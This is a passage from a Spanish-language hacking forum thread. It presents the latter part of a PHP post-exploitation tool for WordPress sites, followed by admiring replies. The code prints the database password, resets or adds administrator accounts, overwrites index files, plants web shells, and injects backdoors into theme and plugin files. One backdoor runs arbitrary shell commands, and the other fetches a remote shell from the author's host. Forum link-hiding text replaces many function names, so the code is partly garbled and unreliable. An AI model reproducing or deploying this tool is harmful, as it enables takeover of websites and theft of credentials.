  396.                                                         <li>Backdoor
  397.                                                                 <ul>
  398.                                                                         <li><a href="?s3ct10n=10">Active Theme</a></li>
  399.                                                                         <li><a href="?s3ct10n=11">Active Plugin</a></li>
  400.                                                                 </ul>
  401.                                                 </ul>
  402.                                         </div>
  403.                                         <div class="data">
  404.                                                 <?php
  405.                                                 $s3ct10n = $_GET['s3ct10n'];
  406.                                                 switch($s3ct10n):
  407.                                                         case '':
  408.                                                 ?>
  409.                                                                 WP Version: <?php echo getVersion(getInfo($_SESSION['dbPref'], 'siteurl')); ?><br />
  410.                                                                 WP Url: <a href="#"><?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?></a><br />
  411.                                                                 WP Mail: <?php echo getInfo($_SESSION['dbPref'], 'admin_email'); ?><br />
  412.                                                                 WP Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION['dbPref'], 'template'); ?></a><br />
  413.                                                                 WP Active Plugins: <br /><?php echo getInstalledPlugins(getInfo($_SESSION['dbPref'], 'siteurl'), getInfo($_SESSION['dbPref'], 'active_plugins')); ?><br />
  414.                                                                 WP Adm Users: <?php echo getTotalAdmins($_SESSION['dbPref']); ?><br />
  415.                                                                 WP Blog Charset: <?php echo getInfo($_SESSION['dbPref'], 'blog_charset'); ?><br />
  416.                                                                 WP DB Host: <?php echo $_SESSION['dbSrvr']; ?><br />
  417.                                                                 WP DB User: <?php echo $_SESSION['dbUser']; ?><br />
  418.                                                                 WP DB Pass: <?php echo $_SESSION['dbPass']; ?><br />
  419.                                                                 WP DB Server: <?php echo $_SESSION['dbName']; ?><br />
  420.                                                                 WP DB Preffix: <?php echo $_SESSION['dbPref']; ?>
  421.                                                         <?php
  422.                                                         break;
  423.                                                         case 'logout':
  424.                                                                 $showForm = true;
  425.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['no'])):
  426.                                                                         echo '<META HTTP-EQUIV="refresh" CONTENT="0; url=?">';
  427.                                                                 elseif(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['yes'])):
  428.                                                                         @No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  429.                                                                         echo '<META HTTP-EQUIV="refresh" CONTENT="0; url=?">';
  430.                                                                 endif;
  431.                                                                 if($showForm):
  432.                                                         ?>
  433.                                                                         <div id="info">Logout?</div>
  434.                                                                         <div id="data">
  435.                                                                                 <div class="clear" style="text-align: center;"><input type="submit" value="No" name="no" /> - <input type="submit" value="Yes" name="yes" /></div>
  436.                                                                         </div>
  437.                                                         <?php
  438.                                                                 endif;
  439.                                                         break;
  440.                                                         case 'selfremove':
  441.                                                                 $showForm = true;
  442.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['no'])):
  443.                                                                         echo '<META HTTP-EQUIV="refresh" CONTENT="0; url=?">';
  444.                                                                 elseif(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['yes'])):
  445.                                                                         @No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  446.                                                                         @No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_SERVER['PHP_SELF']));
  447.                                                                         echo '<META HTTP-EQUIV="refresh" CONTENT="0; url=?">';
  448.                                                                 endif;
  449.                                                                 if($showForm):
  450.                                                         ?>
  451.                                                                         <div id="info">Self remove?</div>
  452.                                                                         <div id="data">
  453.                                                                                 <div class="clear" style="text-align: center;"><input type="submit" value="No" name="no" /> - <input type="submit" value="Yes" name="yes" /></div>
  454.                                                                         </div>
  455.                                                         <?php
  456.                                                                 endif;
  457.                                                         break;
  458.                                                         case 'about':
  459.                                                         ?>
  460.                                                                 <div id="info">About</div>
  461.                                                                 <div id="data">
  462.                                                                 <pre style="text-align: center;">
  463.                          
  464.                           .--,-``-.                    ,-.----.    
  465.  ,--,     ,--,   ___     /   /     '.            ____  \    /  \  
  466.  |'. \   / .`| ,--.'|_  / ../        ;         ,'  , `.|   :    \  
  467.  ; \ `\ /' / ; |  | :,' \ ``\  .`-    '     ,-+-,.' _ ||   |  .\ :
  468.  `. \  /  / .' :  : ' :  \___\/   \   :  ,-+-. ;   , ||.   :  |: |
  469.   \  \/  / ./.;__,'  /        \   :   | ,--.'|'   |  |||   |   \ :
  470.    \  \.'  / |  |   |         /  /   / |   |  ,', |  |,|   : .   /
  471.     \  ;  ;  :__,'| :         \  \   \ |   | /  | |--' ;   | |`-'  
  472.    / \  \  \   '  : |__   ___ /   :   ||   : |  | ,    |   | ;    
  473.   ;  /\  \  \  |  | '.'| /   /\   /   :|   : |  |/     :   ' |    
  474. ./__;  \  ;  \ ;  :    ;/ ,,/  ',-    .|   | |`-'      :   : :    
  475. |   : / \  \  ;|  ,   / \ ''\        ; |   ;/          |   | :    
  476. ;   |/   \  ' | ---`-'   \   \     .'  '---'           `---'.|    
  477. `---'     `--`            `--`-,,-'                      `---`    
  478. </pre>
  479. <pre>
  480. +------------------------------------------------------------------------+
  481. |                       Website: http://xt3mp.mx                         |
  482. |                     Contact: xt3mp[at]null[dot]net                     |
  483. +------------------------------------------------------------------------+
  484. </pre>
  485.                                                                 </div>
  486.                                                         <?php
  487.                                                         break;
  488.                                                         case 1:
  489.                                                         ?>
  490.                                                                 <div id="info">All Admin users appear below:</div>
  491.                                                                 <div id="data"><?php echo getAdmins($_SESSION['dbPref'], 'list'); ?></div>
  492.                                                         <?php
  493.                                                         break;
  494.                                                         case 2:
  495.                                                                 $showForm = true;
  496.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['change_pass'])):
  497.                                                                         $admUser = $_POST['adminId'];
  498.                                                                         $admPass = $_POST['admin_pass'];
  499.                                                                         if(!updateAdmin($_SESSION['dbPref'], $admUser, $admPass)):
  500.                                                                                 echo '<div class="error">Can\'t update admin password: Internal error</div>';
  501.                                                                         else:
  502.                                                                                 $admUser = getAdminById($_SESSION['dbPref'], $admUser);
  503.                                                                                 $showForm = false;
  504.                                                                                 echo '<div class="success">Admin password updated correctly: '.$admUser.'::'.$admPass.'</div>';
  505.                                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  506.                                                                         endif;
  507.                                                                 endif;
  508.                                                         ?>
  509.                                                                 <?php
  510.                                                                 if($showForm):
  511.                                                                 ?>
  512.                                                                         <div id="info">Select Admin User and Insert a New Password:</div>
  513.                                                                         <div id="data">
  514.                                                                                 <div class="clear"><label>User:</label><select name="adminId"><?php echo getAdmins($_SESSION['dbPref']); ?></select>< Select Admin User<br /></div>
  515.                                                                                 <div class="clear"><label>Pass:</label><input type="text" id="new_pass" name="admin_pass" value="new_pass" />< Insert New Password<br /></div>
  516.                                                                                 <div class="clear"><label></label><input type="submit" name="change_pass" value="Change Admin Pass" /></div>
  517.                                                                         </div>
  518.                                                                 <?php
  519.                                                                 endif;
  520.                                                                 ?>
  521.                                                         <?php
  522.                                                         break;
  523.                                                         case 3:
  524.                                                                 $showForm = true;
  525.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['add_admin'])):
  526.                                                                         $admUser = $_POST['admin_user'];
  527.                                                                         $admPass = $_POST['admin_pass'];
  528.                                                                         if(!checkUser($_SESSION['dbPref'], $admUser)):
  529.                                                                                 echo '<div class="error">Can\'t add new Admin User: '.$admUser.' is in use</div>';
  530.                                                                         elseif(!addAdminUser($_SESSION['dbPref'], $admUser, $admPass)):
  531.                                                                                 echo '<div class="error">Can\'t insert new Admin User: Internal error</div>';
  532.                                                                         else:
  533.                                                                                 $showForm = false;
  534.                                                                                 echo '<div class="success">New Admin User inserted correctly: '.$admUser.'::'.$admPass.'</div>';
  535.                                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  536.                                                                         endif;
  537.                                                                 endif;
  538.                                                         ?>
  539.                                                                 <?php
  540.                                                                 if($showForm):
  541.                                                                 ?>
  542.                                                                         <div id="info">Insert New Admin User:</div>
  543.                                                                         <div id="data">
  544.                                                                                 <div class="clear"><label>User:</label><input type="text" id="new_user" name="admin_user" value="Admin2" />< Insert Admin User<br /></div>
  545.                                                                                 <div class="clear"><label>Pass:</label><input type="text" id="new_pass" name="admin_pass" value="new_pass" />< Insert New Password<br /></div>
  546.                                                                                 <div class="clear"><label></label><input type="submit" name="add_admin" value="Add New Admin" /></div>
  547.                                                                         </div>
  548.                                                                 <?php
  549.                                                                 endif;
  550.                                                                 ?>
  551.                                                         <?php
  552.                                                         break;
  553.                                                         case 4:
  554.                                                                 $showForm = true;
  555.                                                                 $indexContent = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./index.php');
  556.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['change_index'])):
  557.                                                                         $newContent = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['new_content']);
  558.                                                                         $newIndex = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('index.php', 'w+');
  559.                                                                         if(!$newIndex):
  560.                                                                                 echo '<div class="error">Can\'t create new index file</div>';
  561.                                                                         else:
  562.                                                                                 $showForm = false;
  563.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($newIndex, $newContent);
  564.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($newIndex);
  565.                                                                                 echo '<div class="success">Index updated correctly</div>';
  566.                                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  567.                                                                         endif;
  568.                                                                 endif;
  569.                                                                 if($showForm):
  570.                                                                 ?>
  571.                                                                         <div id="info">Insert New Index Content (WP Main Index) [fopen]:</div>
  572.                                                                         <div id="data">
  573.                                                                                 <div class="clear"><label>Content:</label><textarea name="new_content" style="text-align: left;font-size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $indexContent; ?></textarea><br /></div>
  574.                                                                                 <div class="clear"><label></label><input type="submit" name="change_index" value="Change Index" /></div>
  575.                                                                         </div>
  576.                                                                 <?php
  577.                                                                 endif;
  578.                                                         ?>
  579.                                                         <?php
  580.                                                         break;
  581.                                                         case 5:
  582.                                                                 $showForm = true;
  583.                                                                 $next = false;
  584.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['change_index'])):
  585.                                                                         $wpUrl = getInfo($_SESSION['dbPref'], 'siteurl');
  586.                                                                         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($wpUrl, -1) == '/')
  587.                                                                                 $wpUrl = No tienes permisos para ver links. Registrate o Entra con tu cuenta($wpUrl, 0, No tienes permisos para ver links. Registrate o Entra con tu cuenta($wpUrl) - 1);
  588.                                                                         $wpUser = $_POST['admin_user'];
  589.                                                                         $wpPass = $_POST['admin_pass'];
  590.                                                                         $wpCont = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['new_content']);
  591.                                                                         if(!checkLogin($wpUrl, $wpUser, $wpPass)):
  592.                                                                                 echo '<div class="error">Can\'t login with: '.$wpUser.'::'.$wpPass.'</div>';
  593.                                                                         else:
  594.                                                                                 $source = sourceIndex($wpUrl, getInfo($_SESSION['dbPref'], 'template'));
  595.                                                                                 $data = @No tienes permisos para ver links. Registrate o Entra con tu cuenta("/<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.*)\" \/></", $source, $wpnonce);
  596.                                                                                 $next = true;
  597.                                                                         endif;
  598.                                                                         if($next === false):
  599.                                                                         elseif($next === true && No tienes permisos para ver links. Registrate o Entra con tu cuenta($wpnonce[1])):
  600.                                                                                 echo '<div class="error">Can\'t get wp nonce</div>';
  601.                                                                         elseif(!changeIndex($wpUrl, $wpCont, getInfo($_SESSION['dbPref'], 'template'), $wpnonce[1])):
  602.                                                                                 echo '<div class="error">Can\'t update index file</div>';
  603.                                                                         else:
  604.                                                                                 $showForm = false;
  605.                                                                                 echo '<div class="success">Index updated correctly</div>';
  606.                                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  607.                                                                         endif;
  608.                                                                 endif;
  609.                                                                 if($showForm):
  610.                                                         ?>
  611.                                                                         <div id="info" style="margin-bottom: 5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION['dbPref'], 'template'); ?></a><br /></div>
  612.                                                                         <div id="info">Insert New Index Content (WP Actual Theme Index) [cURL]:</div>
  613.                                                                         <div id="data">
  614.                                                                                 <div class="clear"><label>User:</label><input type="text" id="new_user" name="admin_user" value="Admin2" />< Insert Admin User<br /></div>
  615.                                                                                 <div class="clear"><label>Pass:</label><input type="text" id="new_pass" name="admin_pass" value="new_pass" />< Insert Admin Password<br /></div>
  616.                                                                                 <div class="clear"><label>Content:</label><textarea name="new_content" style="text-align: left;font-size:13px;font-family:'Courier New', Courier, monospace" rows="5"></textarea><br /></div>
  617.                                                                                 <div class="clear"><label></label><input type="submit" name="change_index" value="Change Index" /></div>
  618.                                                                         </div>
  619.                                                                 <?php
  620.                                                                 endif;
  621.                                                                 ?>
  622.                                                         <?php
  623.                                                         break;
  624.                                                         case 6:
  625.                                                                 $showForm = true;
  626.                                                                 $theme = getInfo($_SESSION['dbPref'], 'template');
  627.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['change_index'])):
  628.                                                                         $wpCont = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['new_content']);
  629.                                                                         $themeContent = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/'.$theme.'/index.php', 'w+');
  630.                                                                         if(!$themeContent):
  631.                                                                                 echo '<div class="error">Can\'t open/found index.php file</div>';
  632.                                                                         else:
  633.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($themeContent, $wpCont);
  634.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($themeContent);
  635.                                                                                 $showForm = false;
  636.                                                                                 echo '<div class="success">Index updated correctly</div>';
  637.                                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
  638.                                                                         endif;
  639.                                                                 endif;
  640.                                                                 if($showForm):
  641.                                                                         $themeContent = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/'.$theme.'/index.php');
  642.                                                         ?>
  643.                                                                         <div id="info" style="margin-bottom: 5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION['dbPref'], 'template'); ?></a><br /></div>
  644.                                                                         <div id="info">Insert New Index Content (WP Actual Theme Index) [fopen]:</div>
  645.                                                                         <div id="data">
  646.                                                                                 <div class="clear"><label>Content:</label><textarea name="new_content" style="text-align: left;font-size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $themeContent; ?></textarea><br /></div>
  647.                                                                                 <div class="clear"><label></label><input type="submit" name="change_index" value="Change Index" /></div>
  648.                                                                         </div>
  649.                                                         <?php
  650.                                                                 endif;
  651.                                                         break;
  652.                                                         case 7:
  653.                                                                 $showForm = true;
  654.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['upload_shell'])):
  655.                                                                         $uploadShell = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_FILES['file']['name']);
  656.                                                                         if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($_FILES['file']['tmp_name'], $uploadShell)):
  657.                                                                                 echo '<div class="error">Can\'t Upload Shell</div>';
  658.                                                                         else:
  659.                                                                                 $showForm = false;
  660.                                                                                 echo '<div class="success">Shell Uploaded Correctly: <a href="'.getInfo($_SESSION['dbPref'], 'siteurl').'/'.$uploadShell.'" target="_blank">'.$uploadShell.'</a></div>';
  661.                                                                         endif;
  662.                                                                 endif;
  663.                                                                 if($showForm):
  664.                                                         ?>
  665.                                                                 <div id="info">Upload Shell To This Path:</div>
  666.                                                                 <div id="data">
  667.                                                                         <div class="clear"><label>File:</label><input type="file" name="file" style="border: 1px dashed #00CF00;"/>
  668.                                                                         <input type="submit" name="upload_shell" value="Upload Shell" style="margin-left: -15px;"/></div>
  669.                                                                 </div>
  670.                                                         <?php
  671.                                                                 endif;
  672.                                                         break;
  673.                                                         case 8:
  674.                                                                 $showForm = true;
  675.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['make_shell'])):
  676.                                                                         $shellTheme = $_POST['shell_theme'];
  677.                                                                         $shellName = $_POST['shell_name'];
  678.                                                                         $shellCont = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['shell_content']);
  679.                                                                         $makeShell = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/'.$shellTheme.'/'.$shellName, 'w+');
  680.                                                                         if(!$makeShell):
  681.                                                                                 echo '<div class="error">Can\'t Make Shell In '.$shellTheme.'</div>';
  682.                                                                         else:
  683.                                                                                 $showForm = false;
  684.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeShell, $shellCont);
  685.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeShell);
  686.                                                                                 echo '<div class="success">Shell Maked Correctly: <a href="'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-content/themes/'.$shellTheme.'/'.$shellName.'" target="_blank">'.$shellName.'</a></div>';
  687.                                                                         endif;
  688.                                                                 endif;
  689.                                                                 if($showForm):
  690.                                                         ?>
  691.                                                                 <div id="info" style="margin-bottom: 5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION['dbPref'], 'template'); ?></a><br /></div>
  692.                                                                 <div id="info">Make Shell To Themes Path [fopen]:</div>
  693.                                                                 <div id="data">
  694.                                                                         <div class="clear"><label>Theme:</label><select name="shell_theme"><?php echo getThemes(); ?></select>< Select Theme<br /></div>
  695.                                                                         <div class="clear"><label>Name:</label><input type="text" id="shell_name" name="shell_name" value="shell.php" />< Insert Shell Name<br /></div>
  696.                                                                         <div class="clear"><label>Content:</label><textarea name="shell_content" style="text-align: left;font-size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $themeContent; ?></textarea><br /></div>
  697.                                                                         <div class="clear"><label></label><input type="submit" name="make_shell" value="Make Shell" /></div>
  698.                                                                 </div>
  699.                                                         <?php
  700.                                                                 endif;
  701.                                                         break;
  702.                                                         case 9:
  703.                                                                 $showForm = true;
  704.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['make_shell'])):
  705.                                                                         $shellPlugin = $_POST['shell_plugin'];
  706.                                                                         $shellName = $_POST['shell_name'];
  707.                                                                         $shellCont = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['shell_content']);
  708.                                                                         $makeShell = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/'.$shellPlugin.'/'.$shellName, 'w+');
  709.                                                                         if(!$makeShell):
  710.                                                                                 echo '<div class="error">Can\'t Make Shell In '.$shellPlugin.'</div>';
  711.                                                                         else:
  712.                                                                                 $showForm = false;
  713.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeShell, $shellCont);
  714.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeShell);
  715.                                                                                 echo '<div class="success">Shell Maked Correctly: <a href="'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-content/plugins/'.$shellPlugin.'/'.$shellName.'" target="_blank">'.$shellName.'</a></div>';
  716.                                                                         endif;
  717.                                                                 endif;
  718.                                                                 if($showForm):
  719.                                                         ?>
  720.                                                                 <div id="info" style="margin-bottom: 5px;">Active Plugins (this can be different to Plugins Path):<br /> <?php echo getInstalledPlugins(getInfo($_SESSION['dbPref'], 'siteurl'), getInfo($_SESSION['dbPref'], 'active_plugins')); ?><br /></div>
  721.                                                                 <div id="info">Make Shell To Plugins Path [fopen]:</div>
  722.                                                                 <div id="data">
  723.                                                                         <div class="clear"><label>Plugin:</label><select name="shell_plugin"><?php echo getPlugins(); ?></select>< Select Plugin<br /></div>
  724.                                                                         <div class="clear"><label>Name:</label><input type="text" id="shell_name" name="shell_name" value="shell.php" />< Insert Shell Name<br /></div>
  725.                                                                         <div class="clear"><label>Content:</label><textarea name="shell_content" style="text-align: left;font-size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $themeContent; ?></textarea><br /></div>
  726.                                                                         <div class="clear"><label></label><input type="submit" name="make_shell" value="Make Shell" /></div>
  727.                                                                 </div>
  728.                                                         <?php
  729.                                                                 endif;
  730.                                                         break;
  731.                                                         case 10:
  732.                                                                 $showForm = true;
  733.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['make_backdoor'])):
  734.                                                                         $backdoorTheme = $_POST['backdoor_theme'];
  735.                                                                         $backdoorType = $_POST['backdoor_type'];
  736.                                                                         $realTheme = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/'.$backdoorTheme.'/index.php');
  737.                                                                         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($realTheme, '<?php')):
  738.                                                                                 $exp = '<?php';
  739.                                                                         elseif(No tienes permisos para ver links. Registrate o Entra con tu cuenta($realTheme, '<?')):
  740.                                                                                 $exp = '<?';
  741.                                                                         endif;
  742.                                                                         if($backdoorType == '1'):
  743.                                                                                 $extra = '?active=true&cmd=COMMAND';
  744.                                                                                 $backdoorCont = 'if(!empty($_GET[\'active\'])){system($_GET[\'cmd\']);exit();}';
  745.                                                                         else:
  746.                                                                                 $extra = '?active=true&filename=SHELL.PHP&externalfile=http://xt3mp.mx/shell.txt';
  747.                                                                                 $backdoorCont = 'if(!empty($_GET[\'active\'])){$fileContent = @file_get_contents($_GET[\'externalfile\']);$file = fopen($_GET[\'filename\'], \'w+\');@fwrite($file, $fileContent);@fclose($file);echo \'<a href="\'.$_GET[\'filename\'].\'">\'.$_GET[\'filename\'].\'</a>\';exit();}';
  748.                                                                         endif;
  749.                                                                         $explode = No tienes permisos para ver links. Registrate o Entra con tu cuenta($exp, $realTheme, 2);
  750.                                                                         $newContent = No tienes permisos para ver links. Registrate o Entra con tu cuenta($exp.' '.$backdoorCont.' '.$explode[1]);
  751.                                                                         $makeBackdoor = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/themes/'.$backdoorTheme.'/index.php', 'w+');
  752.                                                                         if(!$makeBackdoor):
  753.                                                                                 echo '<div class="error">Can\'t Make Backdoor In /wp-content/themes/'.$backdoorTheme.'/index.php</div>';
  754.                                                                         else:
  755.                                                                                 $showForm = false;
  756.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeBackdoor, $newContent);
  757.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeBackdoor);
  758.                                                                                 echo '<div class="success">Backdoor Maked Correctly: <br />'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-content/themes/'.$backdoorTheme.'/index.php'.$extra.'</div>';
  759.                                                                         endif;
  760.                                                                 endif;
  761.                                                                 if($showForm):
  762.                                                         ?>
  763.                                                                 <div id="info" style="margin-bottom: 5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION['dbPref'], 'template'); ?></a><br /></div>
  764.                                                                 <div id="info">Make Shell To Themes Path [fopen]:</div>
  765.                                                                 <div id="data">
  766.                                                                         <div class="clear"><label>Theme:</label><select name="backdoor_theme"><?php echo getThemes(); ?></select>< Select Theme<br /></div>
  767.                                                                         <div class="clear"><label>Type:</label><select name="backdoor_type"><option value="1">system();</option><option value="2">File Downloader</option></select>< Select Backdoor Type</div>
  768.                                                                         <div class="clear"><label></label><input type="submit" name="make_backdoor" value="Make Backdoor" /></div>
  769.                                                                 </div>
  770.                                                         <?php
  771.                                                                 endif;
  772.                                                         break;
  773.                                                         case 11:
  774.                                                                 $showForm = true;
  775.                                                                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['make_backdoor'])):
  776.                                                                         $backdoorPlugin = $_POST['backdoor_plugin'];
  777.                                                                         $backdoorType = $_POST['backdoor_type'];
  778.                                                                         $realPlugin = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/'.$backdoorPlugin);
  779.                                                                         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($realPlugin, '<?php')):
  780.                                                                                 $exp = '<?php';
  781.                                                                         elseif(No tienes permisos para ver links. Registrate o Entra con tu cuenta($realPlugin, '<?')):
  782.                                                                                 $exp = '<?';
  783.                                                                         endif;
  784.                                                                         if($backdoorType == '1'):
  785.                                                                                 $extra = '?active=true&cmd=COMMAND';
  786.                                                                                 $backdoorCont = 'if(!empty($_GET[\'active\'])){system($_GET[\'cmd\']);exit();}';
  787.                                                                         else:
  788.                                                                                 $extra = '?active=true&filename=SHELL.PHP&externalfile=http://xt3mp.mx/shell.txt';
  789.                                                                                 $backdoorCont = 'if(!empty($_GET[\'active\'])){$fileContent = @file_get_contents($_GET[\'externalfile\']);$file = fopen($_GET[\'filename\'], \'w+\');@fwrite($file, $fileContent);@fclose($file);echo \'<a href="\'.$_GET[\'filename\'].\'">\'.$_GET[\'filename\'].\'</a>\';exit();}';
  790.                                                                         endif;
  791.                                                                         $explode = No tienes permisos para ver links. Registrate o Entra con tu cuenta($exp, $realPlugin, 2);
  792.                                                                         $newContent = $exp.' '.$backdoorCont.' '.$explode[1];
  793.                                                                         $makeBackdoor = @No tienes permisos para ver links. Registrate o Entra con tu cuenta('./wp-content/plugins/'.$backdoorPlugin, 'w+');
  794.                                                                         if(!$makeBackdoor):
  795.                                                                                 echo '<div class="error">Can\'t Make Backdoor In /wp-content/plugins/'.$backdoorPlugin.'</div>';
  796.                                                                         else:
  797.                                                                                 $showForm = false;
  798.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeBackdoor, $newContent);
  799.                                                                                 @No tienes permisos para ver links. Registrate o Entra con tu cuenta($makeBackdoor);
  800.                                                                                 echo '<div class="success">Backdoor Maked Correctly: <br />'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-content/plugins/'.$backdoorPlugin.$extra.'</div>';
  801.                                                                         endif;
  802.                                                                 endif;
  803.                                                                 if($showForm):
  804.                                                         ?>
  805.                                                                 <div id="info">Make Shell To Plugins Path [fopen]:</div>
  806.                                                                 <div id="data">
  807.                                                                         <div class="clear"><label>Plugin:</label><select name="backdoor_plugin"><?php echo getInstalledPlugins(getInfo($_SESSION['dbPref'], 'siteurl'), getInfo($_SESSION['dbPref'], 'active_plugins'), true); ?></select>< Select Plugin (Active Plugins)<br /></div>
  808.                                                                         <div class="clear"><label>Type:</label><select name="backdoor_type"><option value="1">system();</option><option value="2">File Downloader</option></select>< Select Backdoor Type</div>
  809.                                                                         <div class="clear"><label></label><input type="submit" name="make_backdoor" value="Make Backdoor" /></div>
  810.                                                                 </div>
  811.                                                         <?php
  812.                                                                 endif;
  813.                                                         break;
  814.                                                         default;
  815.                                                                 echo '<META HTTP-EQUIV="refresh" CONTENT="0; url=?">';
  816.                                                         ?>
  817.                                                 <?php
  818.                                                 endswitch;
  819.                                                 ?>
  820.                                         </div>
  821.                                 <?php
  822.                                 endif;
  823.                                 ?>
  824.                         </fieldset>
  825.                 <?php
  826.                 endif;
  827.                 ?>
  828.         </form>
  829. </div>
  830. <pre style="text-align: center;margin-top: 5px">xt3mp@null.net >> http://xt3mp.mx</pre>
  831. </body>
  832. </html>

Más información:
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Login data:
User: Xt3mP
Pass: root

Importante:
Debes poner este script en el mismo directorio que Wordpress.

Bigs:
Si encuentras cualquier error o bug, favor de postearlo en comentarios.

Xt3mP
« Última modificación: Agosto 06, 2012, 09:34:26 am por Pr0ph3t »
Cada vez que me das Karma me motivas

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #1 en: Agosto 03, 2012, 02:41:51 am »
Sensei Xt3mp :D como siempre excelente  8)
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #2 en: Agosto 03, 2012, 10:19:46 am »
De lo mejor como siempre Xt3mp!
Saludos,, Cronos.-

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #3 en: Agosto 03, 2012, 01:46:17 pm »

Mi joven padawan esta creciendo :'D Muy util la tool, esperemos vayas agregando rapido los demas CMS's
La interfaz me parece buena aunque a unos no les gusto lol (Para la otra te esperas unos dias mas para liberarla a la prole we aa te creas XD)

Desconectado exploit-shell

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • c-intrud3rs
« Respuesta #4 en: Agosto 04, 2012, 12:51:23 pm »
exelente mexicano lindo  ::)

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
